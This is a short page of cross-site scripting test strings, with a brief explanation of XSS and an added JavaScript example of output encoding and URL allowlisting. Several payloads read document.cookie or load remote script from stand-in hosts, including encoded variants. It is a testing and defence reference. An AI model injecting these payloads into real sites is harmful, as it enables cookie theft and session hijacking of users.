XSS Tests





Created: 6 years ago


Edited: 6 years ago

article.php?title=<meta%20http-equiv="refresh"%20content="0;">
http://server/cgi-bin/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>
<script>alert(document.cookie);</script>
<script type="text/vbscript">alert(DOCUMENT.COOKIE)</script>
<script src=http://www.example.com/malicious-code.js></script>
%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.
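
The "validating or encoding" step described above, as an added example that is not part of the original paste: output encoding for HTML content plus a scheme allowlist for URL attributes, checked against test strings from the list on this page. The function names, the templates and the http(s)-only policy are assumptions made for illustration.

```javascript
// Added example (not from the original paste): encode at output time, allowlist URL schemes.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
};

// Encode for HTML element content and quoted attribute values.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Encoding alone does not stop javascript: URLs in src/href, so the scheme
// is parsed and allowlisted. Policy assumption: absolute http(s) only.
function safeUrl(value) {
  let url;
  try {
    url = new URL(String(value)); // WHATWG parser lower-cases the scheme
  } catch {
    return null; // relative or unparsable input is rejected
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// Hypothetical templates standing in for the application's output.
function renderComment(text) {
  return `<p>${encodeForHtml(text)}</p>`;
}

function renderImage(src) {
  const url = safeUrl(src);
  return url === null ? '' : `<img src="${encodeForHtml(url)}">`;
}

// Test strings copied from the list on this page.
const PAGE_VECTORS = [
  '<script>alert(document.cookie);</script>',
  '\'\';!--"<XSS>=&{()}',
  "<IMG SRC=JaVaScRiPt:alert('XSS')>",
  '<IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`>',
];

// True when the rendered fragment carries no markup beyond the <p> wrapper.
function isInert(fragment) {
  const inner = fragment.slice('<p>'.length, -'</p>'.length);
  return !/[<>"'`]/.test(inner);
}

const allInert = () => PAGE_VECTORS.every((v) => isInert(renderComment(v)));
```

The percent-encoded and \x-encoded strings in the list only become markup after the application decodes them, which is why the encoder runs on the final value at the point of output.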



XSS Locator

Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, injecting the deprecated "<PLAINTEXT>" tag will often be enough to check whether something is vulnerable to XSS by messing up the output appreciably:

